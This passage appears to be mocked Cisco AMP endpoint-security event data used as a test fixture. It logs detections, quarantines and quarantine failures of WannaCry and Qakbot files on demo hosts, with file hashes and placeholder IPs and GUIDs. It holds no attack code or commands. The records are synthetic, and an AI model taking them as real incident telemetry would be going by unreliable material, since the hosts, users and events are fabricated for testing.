IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 